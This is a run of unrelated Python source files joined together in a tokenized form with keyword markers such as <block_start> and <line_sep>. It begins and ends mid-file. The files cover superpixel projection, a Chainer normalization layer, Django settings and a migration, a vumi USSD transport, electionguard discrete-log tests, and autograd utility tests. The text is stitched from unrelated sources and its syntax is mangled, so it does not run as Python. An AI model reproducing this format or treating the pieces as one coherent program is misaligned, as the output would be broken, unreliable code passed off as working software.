superpixel_dir base_size images<block_start>dataset=indoor_scenes.IndoorScenesWithAllInfo(dataset_name lmdb_handle superpixel_dir base_size images)<line_sep>scene_id_to_index=dataset.scene_id_to_index<line_sep>image_paths=[]<for_stmt>scene_id tqdm(scene_id_to_index desc='Scene[Coverage]')<block_start>all_frame_coverages=OrderedDict()<line_sep>depths=[]<line_sep>poses=[]<line_sep>superpixels=[]<line_sep>intrinsic=<none><for_stmt>frame_id scene_id_to_index[scene_id]<block_start>sample=dataset[frame_id]<line_sep>depths.append(sample['depth'])<line_sep>poses.append(sample['pose'])<line_sep>superpixels.append(sample['superpixel'])<line_sep>intrinsic=sample['intrinsic']<block_end>world_coordinates,frame_origins,superpixel_origins=project_images_to_world(depths poses intrinsic superpixels scene_id_to_index[scene_id])<for_stmt>frame_id tqdm(scene_id_to_index[scene_id] desc='Scene[Project]')<block_start>sample=dataset[frame_id]<line_sep>frame_coverages=project_world_to_image(sample['depth'] sample['superpixel'] sample['pose'] sample['intrinsic'] world_coordinates frame_origins superpixel_origins)<if_stmt><not>frame_coverages<is><none><block_start>all_frame_coverages[frame_id]=frame_coverages<line_sep>image_paths.append(images[frame_id])<block_end><block_end>#from pprint import pprint #pprint(all_frame_coverages) np.save(os.path.join(constants.SSD_DATASET_ROOT dataset_name "raw" "selections" "coverage_"+superpixel_dir f'{scene_id}.npy') all_frame_coverages)<del_stmt>world_coordinates frame_origins superpixel_origins<del_stmt>depths poses superpixels all_frame_coverages<line_sep>torch.cuda.empty_cache()<block_end><with_stmt>open(os.path.join(constants.SSD_DATASET_ROOT dataset_name "raw" "selections" "coverage_"+superpixel_dir "coverage_paths.txt") "w")<as>fptr<block_start><for_stmt>p image_paths<block_start>fptr.write(p.decode()+"\n")<block_end><block_end><block_end><def_stmt>test_coverage_scannet_sample 
<block_start><import_stmt>constants<import_stmt>os<import_from_stmt>dataloader dataset_base<import_from_stmt>dataloader.indoor_scenes IndoorScenes<line_sep>lmdb_handle=dataset_base.LMDBHandle(os.path.join(constants.HDD_DATASET_ROOT "scannet-sample" "dataset.lmdb") <false>)<line_sep>train_set=IndoorScenes('scannet-sample' lmdb_handle (240 320) 'train')<line_sep>find_superpixel_coverage('scannet-sample' lmdb_handle (240 320) train_set.image_path_subset)<block_end><if_stmt>__name__<eq>'__main__'<block_start>test_coverage_scannet_sample()<block_end>
# Generated by Django 1.11.21 on 2019-06-12 15:50 <import_from_stmt>django.db migrations<class_stmt>Migration(migrations.Migration)<block_start>dependencies=[('blobs' '0008_deletedblobmeta') ]<line_sep>operations=[migrations.DeleteModel(name='BlobExpiration' ) ]<block_end>
<import_stmt>numpy<import_stmt>six<import_from_stmt>chainer.backends cuda<import_from_stmt>chainer.backends intel64<import_from_stmt>chainer function_node<import_from_stmt>chainer.utils type_check<def_stmt>_cu_conv_sum y x n# Convolutional sum # TODO(beam2d): Use scan computation <block_start>rdim=x.size<floordiv>(x.shape[0]<times>x.shape[1])<line_sep>cuda.elementwise('raw T x, int32 rdim, int32 N, int32 n_' 'raw T y' ''' int half_n = n_ / 2; int offset = i / rdim * N * rdim + i % rdim; float sum_part = 0; for (int j = 0; j < N + half_n; ++j) { if (j < N) { sum_part += x[offset + j * rdim]; } if (j >= n_) { sum_part -= x[offset + (j - n_) * rdim]; } if (j >= half_n) { y[offset + (j - half_n) * rdim] = sum_part; } } ''' 'lrn_conv_sum')(x rdim x.shape[1] n y size=x.shape[0]<times>rdim)<block_end><class_stmt>LocalResponseNormalization(function_node.FunctionNode)<block_start>"""Cross-channel normalization function used in AlexNet."""<line_sep>_use_ideep=<false><def_stmt>__init__ self n=5 k=2 alpha=1e-4 beta=.75<block_start>self.n=n<line_sep>self.k=k<line_sep>self.alpha=alpha<line_sep>self.beta=beta<line_sep>self.scale=<none><line_sep>self.indexes=<none><line_sep>self.unit_scale=<none><block_end><def_stmt>check_type_forward self in_types<block_start>type_check.expect(in_types.size()<eq>1)<line_sep>x_type,=in_types<line_sep>type_check.expect(x_type.dtype.kind<eq>'f' x_type.ndim<ge>2 )<block_end><def_stmt>forward_cpu self inputs<block_start><if_stmt>(intel64.should_use_ideep('>=auto')<and>intel64.inputs_all_ready(inputs (4 )))<block_start>self._use_ideep=<true><line_sep><return>self.forward_ideep(inputs)<block_end>x,=inputs<line_sep>self.retain_inputs((0 ))<line_sep>self.retain_outputs((0 ))<line_sep>half_n=self.n<floordiv>2<line_sep>x2=numpy.square(x)<line_sep>sum_part=x2.copy()<for_stmt>i six.moves.range(1 half_n+1)<block_start>sum_part[: i:]<augadd>x2[: :-i]<line_sep>sum_part[: :-i]<augadd>x2[: 
i:]<block_end>self.unit_scale=self.k+self.alpha<times>sum_part<line_sep>self.scale=self.unit_scale<power>-self.beta<line_sep>y=x<times>self.scale<line_sep><return>y <block_end><def_stmt>forward_ideep self inputs<block_start>x,=inputs<line_sep>self.retain_inputs((0 ))<line_sep>self.retain_outputs((0 ))<line_sep>param=intel64.ideep.localResponseNormalizationParam(self.n self.k self.n<times>self.alpha self.beta intel64.ideep.localResponseNormalizationParam.lrn_across_channels)<line_sep>y,indexes=intel64.ideep.localResponseNormalization.Forward(intel64.ideep.array(x) param)<line_sep>self.indexes=indexes<line_sep><return>y <block_end><def_stmt>forward_gpu self inputs<block_start>x,=inputs<line_sep>self.retain_inputs((0 ))<line_sep>self.retain_outputs((0 ))<line_sep>self.y=cuda.cupy.square(x)# temporary self.scale=cuda.cupy.empty_like(self.y)<line_sep>_cu_conv_sum(self.scale self.y self.n)<line_sep>cuda.elementwise('T x, T k, T alpha, T beta' 'T y, T scale' '''scale = k + alpha * scale; y = x * pow(scale, -beta);''' 'lrn_fwd')(x self.k self.alpha self.beta self.y self.scale)<line_sep><return>self.y <block_end><def_stmt>backward self indexes grad_outputs<block_start>x,=self.get_retained_inputs()<line_sep>y,=self.get_retained_outputs()<line_sep>gy,=grad_outputs<line_sep>f=LocalResponseNormalizationGrad(self.n self.k self.alpha self.beta self._use_ideep self.scale self.indexes self.unit_scale )<line_sep><return>f.apply((x y gy))<block_end><block_end><class_stmt>LocalResponseNormalizationGrad(function_node.FunctionNode)<block_start><def_stmt>__init__ self n k alpha beta use_ideep scale=<none> indexes=<none> unit_scale=<none><block_start>self.n=n<line_sep>self.k=k<line_sep>self.alpha=alpha<line_sep>self.beta=beta<line_sep>self._use_ideep=use_ideep<line_sep>self.scale=scale<line_sep>self.indexes=indexes<line_sep>self.unit_scale=unit_scale<block_end><def_stmt>forward_cpu self 
inputs<block_start><if_stmt>self._use_ideep<block_start><return>self._backward_ideep(inputs)<block_end>x,y,gy=inputs<line_sep>half_n=self.n<floordiv>2<line_sep>summand=y<times>gy/self.unit_scale<line_sep>sum_part=summand.copy()<for_stmt>i six.moves.range(1 half_n+1)<block_start>sum_part[: i:]<augadd>summand[: :-i]<line_sep>sum_part[: :-i]<augadd>summand[: i:]<block_end>gx=gy<times>self.scale-2<times>self.alpha<times>self.beta<times>x<times>sum_part<line_sep><return>gx <block_end><def_stmt>_backward_ideep self inputs<block_start>x,y,gy=inputs<line_sep>param=intel64.ideep.localResponseNormalizationParam(self.n self.k self.n<times>self.alpha self.beta intel64.ideep.localResponseNormalizationParam.lrn_across_channels)<line_sep>gx=intel64.ideep.localResponseNormalization.Backward(intel64.ideep.array(x) intel64.ideep.array(gy) self.indexes param)<line_sep><return>gx <block_end><def_stmt>forward_gpu self inputs<block_start>x,y,gy=inputs<line_sep>summand=cuda.elementwise('T scale, T y, T gy' 'T summand' 'summand = y * gy / scale' 'lrn_bwd_summand')(self.scale y gy)<line_sep>gx=cuda.cupy.empty_like(x)<line_sep>_cu_conv_sum(gx summand self.n)<line_sep>cuda.elementwise(' T x, T gy, T scale, T beta, T coeff' 'T gx' 'gx = pow(scale, -beta) * gy - coeff * x * gx' 'lrn_bwd')(x gy self.scale self.beta 2<times>self.alpha<times>self.beta gx)<line_sep><return>gx <block_end><def_stmt>backward self indexes grad_outputs# No trivial way to implement double-backward for this function. <block_start><raise>NotImplementedError<block_end><block_end><def_stmt>local_response_normalization x n=5 k=2 alpha=1e-4 beta=.75<block_start>"""Local response normalization across neighboring channels. This function implements normalization across channels. Let :math:`x` an input image with :math:`N` channels. Then, this function computes an output image :math:`y` by following formula: .. 
math:: y_i = {x_i \\over \\left( k + \\ \\alpha \\sum_{j=\\max{1, i - n/2}}^{\\min{N, i + n/2}} \\ x_j^2 \\right)^\\beta}. Args: x (:class:`~chainer.Variable` or :ref:`ndarray`): Input variable. n (int): Normalization window width. k (float): Smoothing parameter. alpha (float): Normalizer scaling parameter. beta (float): Normalizer power parameter. Returns: ~chainer.Variable: Output variable. See: Section 3.3 of `ImageNet Classification with Deep Convolutional Neural Networks <https://www.cs.toronto.edu/~fritz/absps/imagenet.pdf>`_ """<line_sep><return>LocalResponseNormalization(n k alpha beta).apply((x ))[0]<block_end>
# flake8: noqa <import_from_stmt>.base *<import_from_stmt>os.path abspath dirname join<line_sep>DEBUG=env.bool('DJANGO_DEBUG' default=<true>)<line_sep>TEMPLATES[0]['OPTIONS']['debug']=DEBUG<line_sep>INSTALLED_APPS<augadd>('debug_toolbar' 'django_extensions' )<line_sep>INTERNAL_IPS=('127.0.0.1' )<line_sep># See: https://github.com/django-debug-toolbar/django-debug-toolbar#installation MIDDLEWARE<augadd>('debug_toolbar.middleware.DebugToolbarMiddleware' )<line_sep>SECRET_KEY=env('DJANGO_SECRET_KEY' default='<KEY>')<line_sep>EMAIL_BACKEND='django.core.mail.backends.console.EmailBackend'<line_sep># Use Dummy cache for development CACHES={'default':{'BACKEND':'django.core.cache.backends.dummy.DummyCache' }}<line_sep># Process all tasks synchronously. # Helpful for local development and running tests CELERY_EAGER_PROPAGATES_EXCEPTIONS=<true><line_sep>CELERY_ALWAYS_EAGER=<true><try_stmt><block_start><import_from_stmt>.local *<block_end><except_stmt>ImportError<block_start><pass><block_end>
<import_stmt>pytest<import_from_stmt>bepasty.storage.filesystem Storage<def_stmt>test_contains tmpdir<block_start>storage=Storage(str(tmpdir))<line_sep>name="foo"<line_sep># check if it is not there yet <assert_stmt>name<not><in>storage<with_stmt>storage.create(name 0)# we just want it created, no need to write sth into it <block_start><pass><block_end># check if it is there <assert_stmt>name<in>storage<line_sep>storage.remove(name)<line_sep># check if it is gone <assert_stmt>name<not><in>storage<block_end><def_stmt>test_iter tmpdir<block_start>storage=Storage(str(tmpdir))<line_sep># nothing there yet <assert_stmt>list(storage)<eq>[]<line_sep>names=["foo" "bar" "baz" ]<for_stmt>name names<block_start><with_stmt>storage.create(name 0)# we just want it created, no need to write sth into it <block_start><pass><block_end><block_end><assert_stmt>set(list(storage))<eq>set(names)<block_end><def_stmt>test_invalid_name tmpdir<block_start>storage=Storage(str(tmpdir))<line_sep>name="../invalid"<with_stmt>pytest.raises(RuntimeError)<block_start>storage.create(name 0)<block_end><block_end>
<import_from_stmt>django.conf.urls.defaults *<line_sep>urlpatterns=patterns('' url(r'^login/$' 'authsub.views.login' name="authsub_login") )<line_sep>
# -*- test-case-name: vumi.transports.imimobile.tests.test_imimobile_ussd -*- <import_stmt>re<import_stmt>json<import_from_stmt>datetime datetime timedelta<import_from_stmt>twisted.python log<import_from_stmt>twisted.web http<import_from_stmt>twisted.internet.defer inlineCallbacks<import_from_stmt>vumi.components.session SessionManager<import_from_stmt>vumi.message TransportUserMessage<import_from_stmt>vumi.transports.httprpc HttpRpcTransport<class_stmt>ImiMobileUssdTransport(HttpRpcTransport)<block_start>""" HTTP transport for USSD with IMImobile in India. Configuration parameters: :param str transport_name: The name this transport instance will use to create its queues :param str web_path: The HTTP path to listen on. :param int web_port: The HTTP port to listen on. :param dict suffix_to_addrs: Mappings between url suffixes and to addresses. :param str user_terminated_session_message: A regex used to identify user terminated session messages. Default is '^Map Dialog User Abort User Reason'. :param str user_terminated_session_response: Response given back to the user if the user terminated the session. Default is 'Session Ended'. :param dict redis_manager: The configuration parameters for connecting to Redis. :param int ussd_session_timeout: Number of seconds before USSD session information stored in Redis expires. Default is 600s. """<line_sep>transport_type='ussd'<line_sep>ENCODING='utf-8'<line_sep>EXPECTED_FIELDS=set(['msisdn' 'msg' 'code' 'tid' 'dcs'])<line_sep># errors RESPONSE_FAILURE_ERROR="Response to http request failed."<line_sep>INSUFFICIENT_MSG_FIELDS_ERROR="Insufficiant message fields provided."<def_stmt>validate_config self<block_start>super(ImiMobileUssdTransport self).validate_config()<line_sep># Mappings between url suffixes and the tags used as the to_addr for # inbound messages (e.g. shortcodes or longcodes). This is necessary # since the requests from ImiMobile do not provided us with this. 
self.suffix_to_addrs=self.config['suffix_to_addrs']<line_sep># IMImobile do not provide a parameter or header to signal termination # of the session by the user, other than sending "Map Dialog User Abort # User Reason: User specific reason" as the request's message content. self.user_terminated_session_re=re.compile(self.config.get('user_terminated_session_message' '^Map Dialog User Abort User Reason'))<line_sep>self.user_terminated_session_response=self.config.get('user_terminated_session_response' 'Session Ended')<block_end>@inlineCallbacks<def_stmt>setup_transport self<block_start>super(ImiMobileUssdTransport self).setup_transport()<line_sep># configure session manager r_config=self.config.get('redis_manager' {})<line_sep>r_prefix="vumi.transports.imimobile_ussd:%s"%self.transport_name<line_sep>session_timeout=int(self.config.get("ussd_session_timeout" 600))<line_sep>self.session_manager=<yield>SessionManager.from_redis_config(r_config r_prefix max_session_length=session_timeout)<block_end>@inlineCallbacks<def_stmt>teardown_transport self<block_start><yield>super(ImiMobileUssdTransport self).teardown_transport()<line_sep><yield>self.session_manager.stop()<block_end><def_stmt>get_to_addr self request<block_start>""" Extracts the request url path's suffix and uses it to obtain the tag associated with the suffix. Returns a tuple consisting of the tag and a dict of errors encountered. """<line_sep>errors={}<line_sep>[suffix]=request.postpath<line_sep>tag=self.suffix_to_addrs.get(suffix <none>)<if_stmt>tag<is><none><block_start>errors['unknown_suffix']=suffix<block_end><return>tag errors<block_end>@classmethod<def_stmt>ist_to_utc cls timestamp<block_start>""" Accepts a timestamp in the format `[M]M/[D]D/YYYY HH:MM:SS (am|pm)` and in India Standard Time, and returns a datetime object normalized to UTC time. 
"""<line_sep><return>(datetime.strptime(timestamp '%m/%d/%Y %I:%M:%S %p')-timedelta(hours=5 minutes=30))<block_end><def_stmt>user_has_terminated_session self content<block_start><return>self.user_terminated_session_re.match(content)<is><not><none><block_end>@inlineCallbacks<def_stmt>handle_raw_inbound_message self message_id request<block_start>errors={}<line_sep>to_addr,to_addr_errors=self.get_to_addr(request)<line_sep>errors.update(to_addr_errors)<line_sep>values,field_value_errors=self.get_field_values(request self.EXPECTED_FIELDS)<line_sep>errors.update(field_value_errors)<if_stmt>errors<block_start>log.msg('Unhappy incoming message: %s'%(errors ))<line_sep><yield>self.finish_request(message_id json.dumps(errors) code=http.BAD_REQUEST)<line_sep><return><block_end>from_addr=values['msisdn']<line_sep>log.msg('ImiMobileTransport receiving inbound message from %s to %s.'%(from_addr to_addr))<line_sep>content=values['msg']<if_stmt>self.user_has_terminated_session(content)<block_start><yield>self.session_manager.clear_session(from_addr)<line_sep>session_event=TransportUserMessage.SESSION_CLOSE<line_sep># IMImobile use 0 for termination of a session self.finish_request(message_id self.user_terminated_session_response headers={'X-USSD-SESSION':['0']})<block_end><else_stmt># We use the msisdn (from_addr) to make a guess about the # whether the session is new or not. 
<block_start>session=<yield>self.session_manager.load_session(from_addr)<if_stmt>session<block_start>session_event=TransportUserMessage.SESSION_RESUME<line_sep><yield>self.session_manager.save_session(from_addr session)<block_end><else_stmt><block_start>session_event=TransportUserMessage.SESSION_NEW<line_sep><yield>self.session_manager.create_session(from_addr from_addr=from_addr to_addr=to_addr)<block_end><block_end><yield>self.publish_message(message_id=message_id content=content to_addr=to_addr from_addr=from_addr provider='imimobile' session_event=session_event transport_type=self.transport_type transport_metadata={'imimobile_ussd':{'tid':values['tid'] 'code':values['code'] 'dcs':values['dcs'] }})<block_end>@inlineCallbacks<def_stmt>handle_outbound_message self message<block_start>error=<none><line_sep>message_id=message['message_id']<if_stmt>message.payload.get('in_reply_to')<and>'content'<in>message.payload# IMImobile use 1 for resume and 0 for termination of a session <block_start>session_header_value='1'<if_stmt>message['session_event']<eq>TransportUserMessage.SESSION_CLOSE<block_start><yield>self.session_manager.clear_session(message['to_addr'])<line_sep>session_header_value='0'<block_end>response_id=self.finish_request(message['in_reply_to'] message['content'].encode(self.ENCODING) headers={'X-USSD-SESSION':[session_header_value]})<if_stmt>response_id<is><none><block_start>error=self.RESPONSE_FAILURE_ERROR<block_end><block_end><else_stmt><block_start>error=self.INSUFFICIENT_MSG_FIELDS_ERROR<block_end><if_stmt>error<is><not><none><block_start><yield>self.publish_nack(message_id error)<line_sep><return><block_end><yield>self.publish_ack(user_message_id=message_id sent_message_id=message_id)<block_end><block_end>
<import_stmt>asyncio<import_from_stmt>hypothesis given<import_from_stmt>hypothesis.strategies integers<import_from_stmt>tests.base_test_case BaseTestCase<import_from_stmt>electionguard.constants get_generator get_large_prime<import_from_stmt>electionguard.discrete_log compute_discrete_log discrete_log_async DiscreteLog <import_from_stmt>electionguard.group ElementModP ElementModQ ONE_MOD_P ONE_MOD_Q mult_p g_pow_p <def_stmt>_discrete_log_uncached e:ElementModP<arrow>int<block_start>""" A simpler implementation of discrete_log, only meant for comparison testing of the caching version. """<line_sep>count=0<line_sep>g_inv=ElementModP(pow(get_generator() -1 get_large_prime()) <false>)<while_stmt>e<ne>ONE_MOD_P<block_start>e=mult_p(e g_inv)<line_sep>count=count+1<block_end><return>count<block_end><class_stmt>TestDiscreteLogFunctions(BaseTestCase)<block_start>"""Discrete log tests"""<line_sep>@given(integers(0 100))<def_stmt>test_uncached self exp:int# Arrange <block_start>plaintext=ElementModQ(exp)<line_sep>exp_plaintext=g_pow_p(plaintext)<line_sep># Act plaintext_again=_discrete_log_uncached(exp_plaintext)<line_sep># Assert self.assertEqual(plaintext plaintext_again)<block_end>@given(integers(0 1000))<def_stmt>test_cached self exp:int# Arrange <block_start>cache={ONE_MOD_P:0}<line_sep>plaintext=ElementModQ(exp)<line_sep>exp_plaintext=g_pow_p(plaintext)<line_sep># Act (plaintext_again returned_cache)=compute_discrete_log(exp_plaintext cache)<line_sep># Assert self.assertEqual(plaintext plaintext_again)<line_sep>self.assertEqual(len(cache) len(returned_cache))<block_end><def_stmt>test_cached_one self<block_start>cache={ONE_MOD_P:0}<line_sep>plaintext=ONE_MOD_Q<line_sep>ciphertext=g_pow_p(plaintext)<line_sep>(plaintext_again returned_cache)=compute_discrete_log(ciphertext cache)<line_sep>self.assertEqual(plaintext plaintext_again)<line_sep>self.assertEqual(len(cache) len(returned_cache))<block_end><def_stmt>test_cached_one_async self# Arrange 
<block_start>cache={ONE_MOD_P:0}<line_sep>plaintext=ONE_MOD_Q<line_sep>ciphertext=g_pow_p(plaintext)<line_sep># Act loop=asyncio.new_event_loop()<line_sep>(plaintext_again returned_cache)=loop.run_until_complete(discrete_log_async(ciphertext cache))<line_sep>loop.close()<line_sep># Assert self.assertEqual(plaintext plaintext_again)<line_sep>self.assertEqual(len(cache) len(returned_cache))<block_end><block_end><class_stmt>TestDiscreteLogClass(BaseTestCase)<block_start>"""Discrete log tests"""<line_sep>@given(integers(0 1000))<def_stmt>test_cached self exp:int# Arrange <block_start>plaintext=ElementModQ(exp)<line_sep>exp_plaintext=g_pow_p(plaintext)<line_sep># Act plaintext_again=DiscreteLog().discrete_log(exp_plaintext)<line_sep># Assert self.assertEqual(plaintext plaintext_again)<block_end><def_stmt>test_cached_one self# Arrange <block_start>plaintext=ONE_MOD_Q<line_sep>ciphertext=g_pow_p(plaintext)<line_sep># Act plaintext_again=DiscreteLog().discrete_log(ciphertext)<line_sep># Assert self.assertEqual(plaintext plaintext_again)<block_end><def_stmt>test_cached_one_async self# Arrange <block_start>plaintext=ONE_MOD_Q<line_sep>ciphertext=g_pow_p(plaintext)<line_sep># Act loop=asyncio.new_event_loop()<line_sep>plaintext_again=loop.run_until_complete(DiscreteLog().discrete_log_async(ciphertext))<line_sep>loop.close()<line_sep># Assert self.assertEqual(plaintext plaintext_again)<block_end><block_end>
<import_from_stmt>.registry Registry<line_sep># model MODULE_ZOO_REGISTRY=Registry()<line_sep>MODULE_PROCESS_REGISTRY=Registry()<line_sep>MODULE_WRAPPER_REGISTRY=Registry()<line_sep>MODEL_WRAPPER_REGISTRY=Registry()<line_sep>EMA_REGISTRY=Registry()<line_sep># data DATASET_REGISTRY=Registry()<line_sep>DATALOADER_REGISTRY=Registry()<line_sep>BATCH_SAMPLER_REGISTRY=Registry()<line_sep>AUGMENTATION_REGISTRY=Registry()<line_sep>BATCHING_REGISTRY=Registry()<line_sep># predictor ROI_PREDICTOR_REGISTRY=Registry()<line_sep>BBOX_PREDICTOR_REGISTRY=Registry()<line_sep>MASK_PREDICTOR_REGISTRY=Registry()<line_sep># supervisior ROI_SUPERVISOR_REGISTRY=Registry()<line_sep>BBOX_SUPERVISOR_REGISTRY=Registry()<line_sep>MASK_SUPERVISOR_REGISTRY=Registry()<line_sep># matcher MATCHER_REGISTRY=Registry()<line_sep># sampler ROI_SAMPLER_REGISTRY=Registry()<line_sep>SAMPLER_REGISTRY=Registry()<line_sep># merger ROI_MERGER_REGISTRY=Registry()<line_sep># lr WARM_LR_REGISTRY=Registry()<line_sep>LR_REGISTRY=Registry()<line_sep># evaluator EVALUATOR_REGISTRY=Registry()<line_sep># loss LOSSES_REGISTRY=Registry()<line_sep># image reader IMAGE_READER_REGISTRY=Registry()<line_sep># hook HOOK_REGISTRY=Registry()<line_sep># saver SAVER_REGISTRY=Registry()<line_sep># anchor generate ANCHOR_GENERATOR_REGISTRY=Registry()<line_sep># mask target generate MASK_GENERATOR_REGISTRY=Registry()<line_sep># subcommand SUBCOMMAND_REGISTRY=Registry()<line_sep># initializer INITIALIZER_REGISTRY=Registry()<line_sep># runner RUNNER_REGISTRY=Registry()<line_sep># inferencer INFERENCER_REGISTRY=Registry()<line_sep>VISUALIZER_REGISTRY=Registry()<line_sep># optimizer OPTIMIZER_REGISTRY=Registry()<line_sep>LR_SCHEDULER_REGISTY=Registry()<line_sep>WARM_SCHEDULER_REGISTY=Registry()<line_sep>DATA_BUILDER_REGISTY=Registry()<line_sep>MODEL_HELPER_REGISTRY=Registry()<line_sep># distill MIMIC_REGISTRY=Registry()<line_sep>MIMIC_LOSS_REGISTRY=Registry()<line_sep># box_coder BOX_CODER_REGISTRY=Registry()<line_sep>
# evaluate a smoothed classifier on a dataset <import_stmt>argparse<import_stmt>datetime<import_stmt>os<import_from_stmt>time time<import_from_stmt>architectures get_architecture<import_from_stmt>core Smooth<import_from_stmt>datasets get_dataset DATASETS get_num_classes<import_stmt>torch<line_sep>parser=argparse.ArgumentParser(description='Certify many examples')<line_sep>parser.add_argument("dataset" choices=DATASETS help="which dataset")<line_sep>parser.add_argument("base_classifier" type=str help="path to saved pytorch model of base classifier")<line_sep>parser.add_argument("sigma" type=float help="noise hyperparameter")<line_sep>parser.add_argument("outfile" type=str help="output file")<line_sep>parser.add_argument("--batch" type=int default=1000 help="batch size")<line_sep>parser.add_argument("--skip" type=int default=1 help="how many examples to skip")<line_sep>parser.add_argument("--max" type=int default=-1 help="stop after this many examples")<line_sep>parser.add_argument("--split" choices=["train" "test"] default="test" help="train or test set")<line_sep>parser.add_argument("--N0" type=int default=100)<line_sep>parser.add_argument("--N" type=int default=100000 help="number of samples to use")<line_sep>parser.add_argument("--alpha" type=float default=0.001 help="failure probability")<line_sep>args=parser.parse_args()<if_stmt>__name__<eq>"__main__"# load the base classifier <block_start>checkpoint=torch.load(args.base_classifier)<line_sep>base_classifier=get_architecture(checkpoint["arch"] args.dataset)<line_sep>base_classifier.load_state_dict(checkpoint['state_dict'])<line_sep># create the smooothed classifier g smoothed_classifier=Smooth(base_classifier get_num_classes(args.dataset) args.sigma)<line_sep># prepare output file f=open(args.outfile 'w')<line_sep>print("idx\tlabel\tpredict\tradius\tcorrect\ttime" file=f flush=<true>)<line_sep># iterate through the dataset dataset=get_dataset(args.dataset args.split)<for_stmt>i range(len(dataset))# only certify 
every args.skip examples, and stop after args.max examples <block_start><if_stmt>i%args.skip<ne>0<block_start><continue><block_end><if_stmt>i<eq>args.max<block_start><break><block_end>(x label)=dataset[i]<line_sep>before_time=time()<line_sep># certify the prediction of g around x x=x.cuda()<line_sep>prediction,radius=smoothed_classifier.certify(x args.N0 args.N args.alpha args.batch)<line_sep>after_time=time()<line_sep>correct=int(prediction<eq>label)<line_sep>time_elapsed=str(datetime.timedelta(seconds=(after_time-before_time)))<line_sep>print("{}\t{}\t{}\t{:.3}\t{}\t{}".format(i label prediction radius correct time_elapsed) file=f flush=<true>)<block_end>f.close()<block_end>
<import_from_future_stmt> absolute_import<import_stmt>pkg_resources<line_sep>__version__='0.3.0'<line_sep>BASE_JAR="pyleus-base.jar"<line_sep>BASE_JAR_PATH=pkg_resources.resource_filename('pyleus' BASE_JAR)<line_sep>
# lint as python3 # Copyright 2019 Google LLC. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # pylint: disable=g-complex-comprehension <import_stmt>autograd.numpy<import_from_stmt>autograd.test_util check_grads<import_from_stmt>neural_structural_optimization autograd_lib<import_stmt>numpy<as>np<import_from_stmt>absl.testing absltest<line_sep>cone_filter=autograd_lib.cone_filter<line_sep>gaussian_filter=autograd_lib.gaussian_filter<line_sep>scatter1d=autograd_lib.scatter1d<line_sep>solve_coo=autograd_lib.solve_coo<line_sep>inverse_permutation=autograd_lib.inverse_permutation<line_sep>find_root=autograd_lib.find_root<class_stmt>AutogradLibTest(absltest.TestCase)<block_start><def_stmt>test_gaussian_filter self<block_start>image=np.random.RandomState(0).rand(9 9)<line_sep>width=4<line_sep>np.testing.assert_allclose(gaussian_filter(image width).sum() image.sum())<line_sep>check_grads(<lambda>x:gaussian_filter(x width) modes=['rev'])(image)<block_end><def_stmt>test_cone_filter self<block_start>image=np.random.RandomState(0).rand(5 5)<line_sep>width=4<line_sep>check_grads(<lambda>x:cone_filter(x width) modes=['rev'])(image)<block_end><def_stmt>test_inverse_permutation self<block_start>indices=np.array([4 2 1 7 9 5 6 0 3 8])<line_sep>inv_indices=inverse_permutation(indices)<line_sep>np.testing.assert_array_equal(np.array([7 2 1 8 0 5 6 3 9 4]) inv_indices)<block_end><def_stmt>test_scatter1d self# also tests the `inverse_permutation` function <block_start>nonzero_values=[4 2 7 
9]<line_sep>nonzero_indices=[2 3 7 8]<line_sep>array_len=10<line_sep>u=scatter1d(nonzero_values nonzero_indices array_len)<line_sep>np.testing.assert_array_equal(np.array([0. 0. 4. 2. 0. 0. 0. 7. 9. 0.]) u)<block_end><def_stmt>test_coo_solve self# test solve_coo gradients <block_start>indices=np.array([[i%10 (i-j)%10]<for>i range(10)<for>j range(-3 4)]).T<line_sep>entries=np.random.RandomState(0).randn(indices.shape[-1])<line_sep>b=np.random.RandomState(0).rand(10)<line_sep>check_grads(<lambda>x:solve_coo(entries indices x) modes=['rev'])(b)<line_sep>check_grads(<lambda>x:solve_coo(x indices b) modes=['rev'])(entries)<block_end><def_stmt>test_find_root self# solve for a literal square root <block_start>f=<lambda>x y:y<power>2-x<line_sep>result=find_root(f 2 lower_bound=0 upper_bound=2)<line_sep>np.testing.assert_allclose(result np.sqrt(2))<block_end><def_stmt>test_find_root_grad self<block_start>f=<lambda>x y:y<power>2-abs(autograd.numpy.mean(x))<line_sep>x0=np.random.RandomState(0).randn(3)<line_sep>check_grads(<lambda>x:find_root(f x 0 10 1e-12) modes=['rev'])(x0)<block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>absltest.main()<block_end>
# -*- coding: utf-8 -*- # # Copyright (c) 2018-2019, <NAME> # All rights reserved. # # Licensed under the BSD 3-Clause License: # http://opensource.org/licenses/BSD-3-Clause # <import_stmt>collections<import_from_stmt>collections OrderedDict<as>ODict<import_stmt>hashlib<import_stmt>io<import_stmt>json<import_stmt>os<import_stmt>pathlib<import_stmt>re<import_stmt>sys<import_stmt>textwrap<import_from_stmt>typing Dict List Optional Sequence Union<import_stmt>zipfile<import_from_stmt>.. codeprocessors<import_from_stmt>.. err<import_from_stmt>.. util<class_stmt>Include(dict)<block_start>''' Store code chunk options related to including a file or other external resource. Also perform the include and modify the code chunk as necessary. '''<def_stmt>__init__ self code_chunk include_options# Start by creating fallback values for attributes <block_start>self.code_lines=<none><line_sep>self.code_chunk=code_chunk<if_stmt><not>isinstance(include_options dict)<block_start>code_chunk.source_errors.append('Invalid "include" value "{0}"'.format(include_options))<line_sep><return><block_end><if_stmt><not>all(k<in>self.keywords<for>k include_options)<block_start>unknown_keys=', '.join("{0}".format(k)<for>k include_options<if>k<not><in>self.keywords)<line_sep>code_chunk.source_errors.append('Unknown "include" keywords: {0}'.format(unknown_keys))<block_end><if_stmt><not>all(isinstance(v str)<and>v<for>v include_options.values())<block_start>invalid_value_keys=', '.join("{0}".format(k)<for>k,v include_options.items()<if><not>isinstance(v str)<or><not>v)<line_sep>code_chunk.source_errors.append('Invalid values for "include" keywords: {0}'.format(invalid_value_keys))<block_end>start_keywords=tuple(k<for>k include_options<if>k<in>self._start_keywords)<line_sep>end_keywords=tuple(k<for>k include_options<if>k<in>self._end_keywords)<line_sep>range_keywords=tuple(k<for>k 
